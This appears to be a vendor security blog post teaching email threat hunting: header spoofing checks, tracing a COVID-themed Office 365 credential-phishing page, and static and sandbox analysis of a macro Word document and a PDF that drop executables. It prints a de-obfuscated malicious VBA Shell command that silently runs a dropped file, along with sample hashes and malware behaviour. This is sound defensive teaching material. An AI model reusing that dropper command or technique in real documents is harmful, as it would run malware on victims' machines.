Introduction
Email is one of the primary means of communication in the modern world. We use email to receive notifications about online shopping, financial transactions, and credit card e-statements, to receive one-time passwords during registration, to apply for jobs, auditions, and school admissions, and for many other purposes. Because so many people around the globe depend on email, phishing is an attack method favored by cyber criminals.
In this type of attack, cyber criminals design emails to look convincing and send them to targeted people. The sender pretends to be someone the potential victim knows and trusts, such as a friend or close contact, the bank where they keep their savings, or a social media platform where they might have an account. As soon as the victim clicks on a malicious file or link embedded in one of these emails, they may land in a compromised situation.
Detailed Analysis
In this write-up, I will focus on what to look at while hunting threats in phishing emails.
Header analysis:
An email is divided into three parts: header, body, and attachment. The header part keeps the routing information of the email. It may contain other information like content type, from, to, delivery date, sender origin, mail server, and the actual email address used to send/receive the email.
Important headers
Return-Path:
The Return-Path email address receives delivery status information. The mail server uses it to return undelivered emails and other bounce messages. The recipient server also uses this field to identify spoofed emails: it retrieves all the IP addresses permitted to send for the sender’s domain and compares them with the sending IP. If there is no match, the email should be treated as suspicious and is likely spam or spoofed.
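The matching step described above can be sketched in a few lines. This is a minimal illustration, not a full SPF evaluation: it assumes the permitted ranges have already been collected from the sender domain, and the ranges in `permitted` are hypothetical documentation addresses.

```python
import ipaddress

def ip_is_permitted(sender_ip, permitted_networks):
    """Return True if sender_ip falls inside any of the permitted networks."""
    ip = ipaddress.ip_address(sender_ip)
    return any(ip in ipaddress.ip_network(net) for net in permitted_networks)

# Hypothetical ranges a sender domain might publish (documentation addresses).
permitted = ["192.0.2.0/24", "198.51.100.17/32"]

print(ip_is_permitted("192.0.2.45", permitted))     # inside the first range
print(ip_is_permitted("142.11.243.65", permitted))  # not covered by any range
```

A real check would build the list of ranges from the domain's published policy rather than from a hard-coded list.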
Received:
This field records every hop through which the email was transferred. Each server adds its entry at the top, so the last (bottom-most) entry shows where the email originated.
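To read the hops in the order the message actually travelled, the Received entries can be reversed. The sketch below uses Python's standard email parser; the message in `RAW` and all host names in it are made up for illustration.

```python
from email import message_from_string

# Hypothetical message: every host name below is a placeholder.
RAW = """\
Received: from mx.recipient.example by mailbox.recipient.example; Mon, 1 Jan 2024 10:00:03 +0000
Received: from relay.example.net by mx.recipient.example; Mon, 1 Jan 2024 10:00:02 +0000
Received: from origin.example.org by relay.example.net; Mon, 1 Jan 2024 10:00:01 +0000
From: sender@example.org
Subject: test

body
"""

def hops_oldest_first(raw_message):
    """Return the Received headers ordered from the first hop to the last."""
    msg = message_from_string(raw_message)
    received = msg.get_all("Received", [])  # stored top to bottom
    return list(reversed(received))

for number, hop in enumerate(hops_oldest_first(RAW), start=1):
    print(number, hop.split(";")[0])
```

Keep in mind that only the entries added by servers you trust are reliable; a sender can forge the lower entries.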
Reply-To:
The address in this field receives any reply to the message. In spoofed emails, it often differs from the From address.
Received-SPF:
SPF (Sender Policy Framework) helps to verify that messages appearing to come from a particular domain were sent from servers under the control of the domain’s actual owner. If the value is Pass, the sending IP is authorized to send mail for that domain.
DKIM:
DomainKeys Identified Mail (DKIM) signs the outgoing email with a cryptographic signature placed in the headers. The recipient email server verifies the signature using the public key that the sending domain publishes in DNS, which confirms that the signed parts of the message were not changed in transit.
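A DKIM-Signature header is a list of tag=value pairs, and two of them (the signing domain `d=` and the selector `s=`) tell the verifier where to find the public key in DNS. The sketch below only parses the tags and does not verify anything; the sample value is illustrative, with placeholder data in `bh=` and `b=`.

```python
def parse_dkim_tags(header_value):
    """Split a DKIM-Signature header value into its tag=value pairs."""
    tags = {}
    for part in header_value.split(";"):
        if "=" in part:
            name, value = part.split("=", 1)
            # Whitespace is dropped; it carries no meaning in the base64
            # data of b= and bh=, which is often folded across lines.
            tags[name.strip()] = "".join(value.split())
    return tags

# Illustrative value only; bh= and b= hold placeholder data.
sample = "v=1; a=rsa-sha256; d=example.com; s=selector1; h=from:to:subject; bh=AAAA; b=BBBB"
tags = parse_dkim_tags(sample)

print(tags["a"])
# DNS name under which the public key is published
print(f'{tags["s"]}._domainkey.{tags["d"]}')
```

An email with no DKIM-Signature header at all simply has nothing to parse, which matches a DKIM result of none.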
X-Headers:
These headers are known as experimental or extension headers. They are usually added by the recipient mailbox providers. Fields like X-FOSE-Spam and X-Spam-Score are used to identify spam emails.
Consider the following email message:
Figure1: Raw email header information
- In the above example we notice the return path does not match with the from address, meaning any undelivered email will return to the return path email address.
- In the Received field, the domain name from where this email is sent is hiworks.co.kr (the email spoofing site) and not gki.com. This is clearly not legitimate. Even the IP (142.11.243.65) does not correspond to gki.com, as per the Whois lookup.
- The From email address is different from the Reply-To email address. This clearly implies that any reply will go to @gmail.com, not to @gki.com.
- The Received-SPF value is neutral; the domain gki.com neither permits nor denies the IP (142.11.243.65). A Whois lookup further confirms that this IP does not belong to the domain.
- DKIM is none. This means the email is unsigned.
Based on the above information the email is suspected to be spoofed. We should put the extracted email IDs in the block list.
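The manual checks above can be turned into a small triage helper. This is a sketch under stated assumptions: the function name `header_red_flags` is hypothetical, the sample headers use placeholder addresses rather than the ones from the figure, and a flag is a reason to look closer, not proof of spoofing.

```python
from email import message_from_string
from email.utils import parseaddr

def header_red_flags(raw_headers):
    """List simple mismatches that suggest a spoofed sender."""
    msg = message_from_string(raw_headers)
    flags = []

    def domain(header):
        address = parseaddr(msg.get(header, ""))[1]
        return address.rpartition("@")[2].lower()

    from_domain = domain("From")
    for header in ("Return-Path", "Reply-To"):
        other = domain(header)
        if other and other != from_domain:
            flags.append(f"{header} domain {other} differs from From domain {from_domain}")

    # The SPF result is the first word of the Received-SPF value.
    spf = msg.get("Received-SPF", "").split(" ", 1)[0].lower()
    if spf != "pass":
        flags.append(f"SPF result is {spf or 'missing'}")

    if "DKIM-Signature" not in msg:
        flags.append("no DKIM signature")
    return flags

# Placeholder headers, loosely modelled on the case discussed above.
SAMPLE = """\
Return-Path: <bounce@mailer.example>
From: "Accounts" <billing@corp.example>
Reply-To: someone@webmail.example
Received-SPF: neutral (sender IP is not covered by the policy)
Subject: Invoice

"""

for flag in header_red_flags(SAMPLE):
    print("-", flag)
```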
Email Body Analysis:
The bodies of the phishing emails we receive mostly target our trust by including content that appears faithful and reliable. They are so personalized and seemingly genuine that victims often take the bait. Let us look at the example below and understand what actions should be taken in such a scenario.
Figure2: Phishing email related to COVID-19
In the above email, the spammer pretends to be a medical insurance service provider and this mail is regarding a health-plan payment invoice for COVID-19 insurance the victim has supposedly purchased recently.
Figure2: Phishing email related to COVID-19 (continued)
Moreover, if we look closely at the bottom of the email, we can see the message, ‘This email has been scanned by McAfee’. This makes the email appear believable, as well as trustworthy.
Now, if we hover the mouse pointer over the |SEE DETAILS| button, a OneDrive link pops up. Rather than clicking the link, we should copy it and open it separately.
Figure3: Downloaded html file after clicking on the OneDrive link.
To execute the above OneDrive link separately (hxxps://1drv[.]ms/u/s!Ajmzc7fpBw5lrzwfPwIkoZRelG4D), it would be preferable to load it inside an isolated environment. If you do not have such an environment available yourself, you can use an online browser service like Browserling.
After loading the link in the browser, you will notice that it downloads an html attachment. Clicking on the html file takes us to another webpage (hxxps://selimyildiz[.]com.tr/wp-includes/fonts/greec/xls/xls/open/index.htm).
Figure4: Fake Office 365 login page
The content of the site is a lookalike of an online Microsoft Excel document where it is asking for Office 365 login details to download it. Before doing anything here we need to check a few more things.
Figure5: WordPress admin panel of selimyildiz[.]com.tr
To further validate whether the webpage is genuine or not, I have shortened the URL to its domain level to load it. The domain leads to a WordPress login page which does not belong to Microsoft, further arousing suspicion.
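Shortening a URL to its domain level is easy to do programmatically, which helps when many links need the same treatment. The sketch below assumes the defanging style used in this write-up (`hxxp` and `[.]`); the helper names are hypothetical, and the result is printed defanged so it cannot be clicked by accident.

```python
from urllib.parse import urlsplit

def refang(url):
    """Undo the defanging used in reports so the URL can be parsed."""
    return url.replace("hxxp", "http", 1).replace("[.]", ".")

def hostname_of(defanged_url):
    """Return only the host part of a defanged URL."""
    return urlsplit(refang(defanged_url)).hostname

url = "hxxps://selimyildiz[.]com.tr/wp-includes/fonts/greec/xls/xls/open/index.htm"
host = hostname_of(url)

# Print the host defanged again for safe sharing.
print(host.replace(".", "[.]", 1))
```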
Figure 6: whois information of selimyildiz[.]com.tr
As per the whois information, this domain has not been registered by Microsoft, and it resolves to the public IP 2.56.152.159, which is also not owned by Microsoft. This clearly indicates that it is not a genuine website.
Figure7: Attempting to login with random credentials to validate the authentication
Now, to check the behavior, I went back to the login page, entered some random credentials, and tried to download the invoice. As expected, I was faced with a login failed error. There are two probable reasons for this failure: first, to make the victim believe that it is a genuine login page or, second, to make the victim retype the password in case they made a typing error the first time.
Figure8: Fake invoice to lure the victim
Now that we know this is fake, what is next? To validate the authentication check, I entered random credentials again and bingo! This time it redirects to a PDF invoice, which looks genuine because it appears to belong to a medical company. The sad part is that if a victim falls into this trap, their login credentials will already have been phished by the time they realize the invoice is fake.
Email Attachment Analysis:
In email, users commonly share two types of documents as attachments: Microsoft Office documents and PDF files. These are often used in document-based malware campaigns. To exploit the targeted systems, attackers usually weaponize these documents using VBA or JavaScript and distribute them via (phishing) emails.
In the first section of this part, we will analyze a malicious Word document. This type of document contains malicious Visual Basic for Applications (VBA) code, known as macros. Sometimes a macro triggers the moment a document is opened but, from Microsoft Office 2007 onwards, a macro cannot execute until the user enables the macro content. To get past this obstacle, attackers use various social engineering methods, where the primary goal is to build trust with the victim so that they click on the ‘Enable Editing’ button without a second thought.
Word Document Analysis:
File Name: PR_Report.bin
Hash: e992ffe746b40d97baf56098e2110ff3978f8229ca333e87e24d1539cea7415c
Tools:
- Oletools
- Yara
- Didier Stevens Suite
- Process Monitor
- Windows Network Monitor (Packet capture tool)
Step 1: Getting started with File properties
It is always good practice to get familiar with the properties before starting any file analysis. We can get the details using the ‘file’ command in Linux.
- We have found the file is a “Microsoft Office Word file”
- Create Time/Date: Thu Jun 28 16:48:00 2018
- Last Saved Time: Thu Jun 28 16:54:00 2018
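Alongside the file properties, it is worth confirming that the sample on disk is the one identified by the hash listed above. The following is a minimal sketch; `sha256_of` is a hypothetical helper, and the in-memory bytes stand in for a real file.

```python
import hashlib
import io

def sha256_of(stream, chunk_size=65536):
    """Hash a binary file-like object in chunks to keep memory use flat."""
    digest = hashlib.sha256()
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        digest.update(chunk)
    return digest.hexdigest()

# In-memory stand-in for a sample; with a file on disk you would pass
# open(path, "rb") instead of io.BytesIO.
print(sha256_of(io.BytesIO(b"not a real sample")))
```

Comparing the printed value with the published hash guards against analyzing the wrong file.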
Step 2: Apply Yara rules
Yara is a tool to identify and classify malware. It performs signature-based detection against any file. Let us check a couple of premade Yara rules from the Didier Stevens Suite.
- The above Yara rule (maldoc.yara) matches the OLE file magic number (D0 CF 11 E0) which is nothing but the HEX identifier (magic bytes) for Microsoft Office documents.
- It also detects a couple of suspicious imports inside the file like GetProcAddr and LoadLibrary.
- This Yara rule (contains_pe_file.yara) checks if a file has any PE file embedded. Based on that it matches the above strings from the file. MZ is a signature of a PE file.
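To make the idea of signature matching concrete, here is a rough Python imitation of what such rules look for. It is not Yara and not the actual rule logic: it only checks for the magic bytes and strings named above, and a bare "MZ" search is far noisier than a real rule, which would also validate the PE header. The sample bytes are synthetic.

```python
OLE_MAGIC = bytes.fromhex("D0CF11E0")
SUSPICIOUS = [b"GetProcAddr", b"LoadLibrary", b"MZ"]

def scan(data):
    """Return the names of the simple signatures found in data."""
    hits = []
    if data.startswith(OLE_MAGIC):
        hits.append("OLE magic")
    hits += [s.decode() for s in SUSPICIOUS if s in data]
    return hits

# Synthetic bytes, not a real document.
sample = OLE_MAGIC + b"\x00" * 16 + b"...LoadLibraryA...MZ\x90\x00"
print(scan(sample))
```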
Step 3: Dump the document contents using oledump.py
As we know, an OLE file contains streams of data. Oledump.py will help us to analyze those streams further to extract macros or objects out of it.
You may notice in the above figure the letters ‘M’ and ‘O’ against streams 8, 9 and 15: ‘M’ appears on streams 8 and 9, and ‘O’ on stream 15. Here ‘M’ indicates that the stream might contain macro code and ‘O’ indicates an object.
Step 4: Extract the VBA code from the macros
- In stream 8, the code contains a method named ‘killo’. This function saves the document with the same file name.
- In stream 9, the code provides a lot of interesting information.
- In the Document_Open() function we can find file names such as 5C.pif and 6C.pif, where 5C.pif is copied to ‘6C.pif’ using the FileCopy function.
- In the later part, the function calls the ‘killo’ method from the other module (stream 8).
- In the end, the Document_Close() function executes an obfuscated command using Shell. After de-obfuscation, we see it pings localhost and then executes 6C.pif in the background (using the vbHide window style).
Shell cmd.exe /c ping localhost -n 100 && start Environ(“Temp”) & “\6C.pif”, vbHide
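Once the macro source is extracted, a quick keyword pass highlights the parts worth reading first. The sketch below is a simplified triage, assuming short keyword lists chosen from the names seen in this sample; the VBA in `sample` is a made-up fragment, not the code from the document.

```python
import re

AUTOEXEC = ["Document_Open", "Document_Close", "AutoOpen"]
SUSPICIOUS = ["Shell", "FileCopy", "Environ", "vbHide"]

def triage(vba_source):
    """Report which auto-run triggers and risky calls appear in the source."""
    def found(words):
        return [w for w in words
                if re.search(rf"\b{re.escape(w)}\b", vba_source, re.IGNORECASE)]
    return {"autoexec": found(AUTOEXEC), "suspicious": found(SUSPICIOUS)}

# Made-up fragment for illustration only.
sample = '''
Sub Document_Open()
    FileCopy src, dst
End Sub
Sub Document_Close()
    Shell cmd, vbHide
End Sub
'''
print(triage(sample))
```

Keyword hits only point to where to look; obfuscated macros can hide these names, so the code still needs to be read.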
Step 5: Extract file from the ole object.
It is clear that the document has an embedded file which can be extracted using the oleobj tool.
- As shown above, oleobj extracts the embedded file from the object and saves it inside the current working directory.
- The above highlighted part also provides details about the source path and temporary path where the file is going to save itself inside the victim’s system after execution of the document.
Step 6: Getting the static information from the extracted file.
- The above information shows us this is a PE32 executable for MS Windows.
- For confirmation, we can also run pecheck.py tool and find the PE headers inside the file.
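The same confirmation can be done by hand, since a PE file is recognizable from two fixed markers: the MZ signature at the start and the PE signature at the offset stored at 0x3C. The sketch below reads only those fields; the 70-byte `sample` is synthetic, and `pe_machine` is a hypothetical helper name.

```python
import struct

MACHINES = {0x014C: "x86", 0x8664: "x64"}

def pe_machine(data):
    """Return the target machine of a PE image, or None if it is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    # The field at offset 0x3C holds the file offset of the PE header.
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    if data[pe_offset:pe_offset + 4] != b"PE\x00\x00" or len(data) < pe_offset + 6:
        return None
    (machine,) = struct.unpack_from("<H", data, pe_offset + 4)
    return MACHINES.get(machine, hex(machine))

# Synthetic image: a DOS header stub followed by a PE signature and machine.
dos = bytearray(0x40)
dos[:2] = b"MZ"
struct.pack_into("<I", dos, 0x3C, 0x40)
sample = bytes(dos) + b"PE\x00\x00" + struct.pack("<H", 0x014C)

print(pe_machine(sample))
```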
Step 7: Behavior analysis
Set up a Windows 7 32-bit VM, change the file extension to ‘.exe’, and start Apate DNS and the Windows Network Monitoring tool before executing the file.
Figure9: Command and Control domain’s DNS queries captured in Apate DNS
Figure10: Captured network traffic of 5C.exe while trying to communicate with the C2
- The results in Apate DNS and the Microsoft Network Monitoring tool show that the file created a process named 5C.exe and repeatedly tried to connect to multiple C2 servers.
Figure11: Registry changes captured in Process Monitor
- Process Monitor tells us that 5C.exe modified the Internet Settings Registry keys. It disabled the IE browser proxy by setting ProxyEnable to 0 and set the 9th byte of SavedLegacySettings to “09”. This means the browser has the proxy disabled and automatically detects the internet settings.
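The 9th byte is usually read as a set of bit flags. The decoding below is a sketch based on the commonly reported meaning of those bits, which is an assumption here rather than something taken from the captured data; the `blob` is synthetic and only its 9th byte matters.

```python
# Commonly reported flag meanings (assumed, not from official documentation).
FLAGS = {
    0x01: "direct connection",
    0x02: "manual proxy",
    0x04: "auto-config script",
    0x08: "auto-detect settings",
}

def decode_connection_flags(blob):
    """Decode the 9th byte (zero-based index 8) of the settings blob."""
    value = blob[8]
    return [name for bit, name in FLAGS.items() if value & bit]

# Synthetic blob: eight padding bytes, the flag byte 0x09, then more padding.
blob = bytes(8) + b"\x09" + bytes(4)
print(decode_connection_flags(blob))
```

Under this reading, 0x09 combines a direct connection with automatic detection, which agrees with the proxy being disabled.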
We can summarize it as the Word document first ran a VBA macro, dropped and ran an embedded executable, created a new process, communicated with the C2 servers and made unauthorized Registry changes. This is enough information to consider the document as malicious. From this point, if we want, we can do more detailed analysis like debugging the executable or analyzing the process dump to learn more about the file behavior.
PDF Document Analysis:
A PDF document can be defined as a collection of objects that describes how the pages should be displayed inside the file.
Usually, an attacker uses email or other social engineering techniques to lure the user into clicking or opening the PDF document. The moment a user opens the PDF file, it typically executes JavaScript in the background, which may exploit an existing vulnerability in Adobe’s PDF reader or drop an executable payload that performs the rest of the objectives.
A PDF file has four components: header, body, cross-reference table, and trailer.
- Header is the topmost part of the document. It shows information related to the version of the document.
- Body contains the document’s objects. Objects can hold streams, which are used to store the data.
- The cross-reference table points to each object.
- Trailer points to the cross-reference table.
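The four components can be located in a file with a few pattern searches. The sketch below builds a tiny, hand-made PDF skeleton in memory (an assumption for illustration, not Report.pdf) and checks that the offset after `startxref` really lands on the cross-reference table.

```python
import re

def pdf_layout(data):
    """Locate the header version, objects, xref table and trailer."""
    header = re.match(rb"%PDF-(\d\.\d)", data)
    startxref = re.search(rb"startxref\s+(\d+)\s+%%EOF", data)
    xref_offset = int(startxref.group(1)) if startxref else None
    return {
        "version": header.group(1).decode() if header else None,
        "objects": len(re.findall(rb"\d+\s+\d+\s+obj\b", data)),
        "xref_offset": xref_offset,
        "xref_found": xref_offset is not None
                      and data[xref_offset:xref_offset + 4] == b"xref",
        "has_trailer": b"trailer" in data,
    }

# Hand-made skeleton with a single object.
body = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
sample = (
    body
    + b"xref\n0 2\n0000000000 65535 f \n0000000009 00000 n \n"
    + b"trailer\n<< /Size 2 /Root 1 0 R >>\n"
    + b"startxref\n" + str(len(body)).encode() + b"\n%%EOF\n"
)

print(pdf_layout(sample))
```

Real files may carry several cross-reference sections from incremental updates, which this sketch does not follow.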
File name: Report.pdf
Sha256: a7b423202d5879d1f9e47ae85ce255e3758c5c1e5b19fcd56691dab288a47b4c
Tools –
Step 1: Scan the pdf document with PDFiD
PDFiD is a part of the Didier Stevens Suite. It scans the pdf document with a list of strings, which helps you to identify the information like JavaScript, Embedded files, actions while opening the documents and the count of the occurrences of some specific strings inside the pdf file.
- According to the result shown above, PDFiD has identified the number of objects, streams, /JS, /JavaScript, OpenAction present inside the Report.pdf file. Here is some information about them.
- /JS, /JavaScript or /RichMedia means the PDF document contains JavaScript or Flash media.
- /EmbeddedFile indicates the presence of other file formats inside the PDF file.
- /OpenAction, /AA and /AcroForm tell us that an automatic action should be executed when the PDF document is opened or viewed.
- Streams contain data inside an object.
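The counting idea behind this kind of scan can be illustrated in a few lines. This is a simplified imitation, not PDFiD itself: it counts plain-text names only and does not handle obfuscated (hex-encoded) names or compressed streams. The bytes in `sample` are a made-up fragment.

```python
import re

KEYWORDS = ["/JS", "/JavaScript", "/OpenAction", "/AA",
            "/AcroForm", "/EmbeddedFile", "/RichMedia"]

def count_keywords(data):
    """Count occurrences of each risky PDF name in raw bytes."""
    counts = {}
    for keyword in KEYWORDS:
        # Require a non-alphanumeric character (or end of data) after the
        # name so that /AA does not also count a longer name such as /AAbc.
        pattern = re.escape(keyword.encode()) + rb"(?![A-Za-z0-9])"
        counts[keyword] = len(re.findall(pattern, data))
    return counts

# Made-up fragment for illustration.
sample = b"<< /OpenAction 5 0 R >> << /S /JavaScript /JS (app.alert(1)) >>"
for name, count in count_keywords(sample).items():
    print(f"{name:14} {count}")
```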
Step 2: Looking inside the Objects
We have now discovered that there is JavaScript present inside the pdf file so let us start from there. We will run pdf-parser.py to search the JavaScript indirect object.
- The above result shows the JavaScript will launch the file ‘virus’ whenever the pdf is opened so, in the next step, we will extract the mentioned file from the pdf.
Step 3: Extract the embedded file using peepdf.
Peepdf is a tool built in Python, which provides all the necessary components in one place that are required during PDF analysis.
Syntax: peepdf -i file_name.pdf
The -i option enables interactive mode.
To learn more, just type help with the topic and explore the options it displays.
- The above result from peepdf indicates the embedded file is referenced in object number 14. Looking inside object 14, we find it points to object 15; similarly, object 15 points to object 16. Finally, we get a clue about the existence of the file ‘virus’ inside object 17. Attackers usually design documents like this to avoid detection. Now, if we look inside PDF version 1, there is only one stream available, which also points to 17. From this, we know that object 17 is a stream and the file is stored inside it.
- Now inside stream 17, we get the file signature starting with MZ and hex value starting with 4d 5a, which indicates this is a PE executable file.
- Now save the stream as virus.exe and run the file command for confirmation.
Step 4: Behavior analysis
Now set up a Windows 7 32-bit virtual machine and execute the file.
Figure12: Process Explorer displays processes created by virus.exe
- As shown in Process Explorer, virus.exe created a couple of suspicious processes (zedeogm.exe, cmd.exe) and they were terminated after execution.
Figure13: Process Monitor captured the system changes made by virus.exe
The results in Process Monitor show the file was dropped as zedeogm.exe. Later it modified the Windows firewall rule. Then it executed WinMail.exe, following which it started cmd.exe to execute ‘tmpd849fc4d.bat’ and exited the process.
At this point, we have collected enough evidence to treat the PDF file as malicious. We can also perform additional steps such as binary debugging and memory forensics on the extracted IOCs to hunt for further threats.
Conclusion
In this write-up, we have covered the purpose of email threat hunting and how it helps us take preventive action against unknown threats. We have identified the areas we should investigate when hunting threats. We have also seen how a malicious URL can be hidden inside an email body and how to analyze it to determine whether it is malicious.
To stay protected:
- Never trust the email sender. Always check the basic identity verification before responding to any email.
- Never click on any links or open any attachment if the email sender is not genuine.
- Attackers often use arbitrary domain names. So read the site address carefully to avoid the typo-squatting trap.
- Cross-check the website background before providing any personal information like name, address, login details, financial information etc.
- If you realize that you have already entered your credentials into an unauthorized site, change your password immediately.
- Use McAfee Web Gateway or McAfee WebAdvisor to get maximum security against malicious URLs and IPs.
- For protection from drive-by downloads and real-time threats associated with email attachments, enabling McAfee Endpoint Security’s Suspicious Attachment detection is highly recommended.
- MVISION Unified Cloud Edge protects against the Tactics, Techniques and Procedures (TTPs) used by Advanced Persistent Threats.
- Suspicious links can be submitted to http://trustedsource.org to check the status and to submit for review.
- Suspicious files can be submitted to McAfee Labs.